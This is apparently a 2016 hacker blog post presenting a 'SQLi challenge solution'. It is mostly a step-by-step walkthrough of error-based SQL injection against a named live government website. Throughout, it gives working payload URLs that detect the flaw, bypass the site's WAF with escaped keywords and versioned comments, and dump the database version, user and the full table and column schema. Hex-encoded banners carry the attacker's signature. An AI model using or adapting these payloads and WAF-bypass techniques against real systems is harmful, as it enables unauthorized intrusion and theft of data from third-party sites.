Sunday, January 3, 2016

SQLi Challenge Solution 3

So, First of all hello guys ^_^ as always :p

My tasks and rules was this...

















As You know MySQL Union Based Injection will not work.

Now we'll think bout error based.. but sadly in this query some words are not acceptable according to my rules..

Now we'll think Xpath will work but it's not for DIOS .. it shows less data and Polygon Injection show few more data than xpath injection.

For this challenge Dual Injection is best it shows most data than all these injections..

and Query of Dual Injection is this :

and(select(!dark-~007)from(select (@@version) dark)angel)--+-

So, let's start...

1. We'll see website is vuln or not

http://bpc.gov.bd/gallery.php?id=6' > error

2. Now We'll check Which comment is working

http://bpc.gov.bd/gallery.php?id=6'--+- > No error it means this comment is working ^_^

3. We'll Execute Dual Injection Query.

http://bpc.gov.bd/gallery.php?id=6' and(select(!dark-~007)from(select (@@version) dark)angel)--+- > WAF -_-

4. We'll Bypass The WAF.. We'll Put \ to know which word is blocked

http://bpc.gov.bd/gallery.php?id=6' and(select(!dark-~007)from(select (@@ver\sion) dark)angel)--+- > no error it means version is blocked

http://bpc.gov.bd/gallery.php?id=6' and(select(!dark-~007)from(select (/*!50000@@version*/) dark)angel)--+- > :) Byassed...

5. First we'll print Cyber name,version,database and user to DIOS...

http://bpc.gov.bd/gallery.php?id=6' and(select(!dark-~007)from(select (concat(/*!50000@@version*/,database(),user()) dark)angel)--+- > Again WAF -_-

http://bpc.gov.bd/gallery.php?id=6' and(select(!dark-~007)from(select (c\oncat(/*!50000@@version*/,dat\abase(),us\er()) dark)angel)--+- > no error now time to bypass these words

http://bpc.gov.bd/gallery.php?id=6' and(select(!dark-~007)from(select (concat (/*!50000@@version*/,/*!50000database*/(),/*!50000user*/())) dark)angel)--+-

Now We'll add Cyber name , Version :: , Database :: , User :: and <br>

http://bpc.gov.bd/gallery.php?id=6' and(select(!dark-~007)from(select (concat (0x3c68323e496e6a6563746564206279204434524b20344e4733313c2f68323e,0x3c703e56657273696f6e203a3a203c2f703e,/*!50000@@version*/,0x3c62723e,0x3c703e4461746162617365203a3a3c2f703e,/*!50000database*/(),0x3c62723e,0x3c703e55736572203a3a3c2f703e,/*!50000user*/(),0x3c62723e)) dark)angel)--+- > Done ! Printed

6. Now We'll Dump Tables and Columns to complete the DIOS...

To Dump Tables and Columns I'll use this Query :

(select(@) from(select(@:=0x00),(select(0) from(information_schema.columns)where(table_schema!=0x696e666f726d6174696f6e5f736368656d61)and(0x00)in(@:=concat (@,0x3c6c693e,table_name,0x203a3a20,column_name))))x)


http://bpc.gov.bd/gallery.php?id=6' and(select(!dark-~007)from(select (concat (0x3c68323e496e6a6563746564206279204434524b20344e4733313c2f68323e,0x3c703e56657273696f6e203a3a203c2f703e,/*!50000@@version*/,0x3c62723e,0x3c703e4461746162617365203a3a3c2f703e,/*!50000database*/(),0x3c62723e,0x3c703e55736572203a3a3c2f703e,/*!50000user*/(),0x3c62723e,(select(@) from(select(@:=0x00),(select(0) from(information_schema.columns)where(table_schema!=0x696e666f726d6174696f6e5f736368656d61)and(0x00)in(@:=concat (@,0x3c6c693e,table_name,0x203a3a20,column_name))))x))) dark)angel)--+- > Blocked by WAF

http://bpc.gov.bd/gallery.php?id=6' and(select(!dark-~007)from(select (concat (0x3c68323e496e6a6563746564206279204434524b20344e4733313c2f68323e,0x3c703e56657273696f6e203a3a203c2f703e,/*!50000@@version*/,0x3c62723e,0x3c703e4461746162617365203a3a3c2f703e,/*!50000database*/(),0x3c62723e,0x3c703e55736572203a3a3c2f703e,/*!50000user*/(),0x3c62723e,(select(@) fr\om(select(@:=0x00),(select(0) fro\m(info\rmation_schema.columns)wh\ere(ta\ble_schema!=0x696e666f726d6174696f6e5f736368656d61)and(0x00)in(@:=concat (@,0x3c6c693e,ta\ble_name,0x203a3a20,colu\mn_name))))x))) dark)angel)--+- > No error now time to bypass these words

http://bpc.gov.bd/gallery.php?id=6' and(select(!dark-~007)from(select (concat (0x3c68323e496e6a6563746564206279204434524b20344e4733313c2f68323e,0x3c703e56657273696f6e203a3a203c2f703e,/*!50000@@version*/,0x3c62723e,0x3c703e4461746162617365203a3a3c2f703e,/*!50000database*/(),0x3c62723e,0x3c703e55736572203a3a3c2f703e,/*!50000user*/(),0x3c62723e,(select(@) /*!50000from*/(select(@:=0x00),(select(0) /*!50000from*/(/*!50000information_schema*/.columns)/*!50000where*/(/*!50000table_schema*/!=0x696e666f726d6174696f6e5f736368656d61)and(0x00)in(@:=concat (@,0x3c6c693e,/*!50000table_name*/,0x203a3a20,/*!50000column_name*/))))x))) dark)angel)--+- > DIOS Bypassed :D


Challenge Solved !

Happy Injecting....

#D4RK_4NG31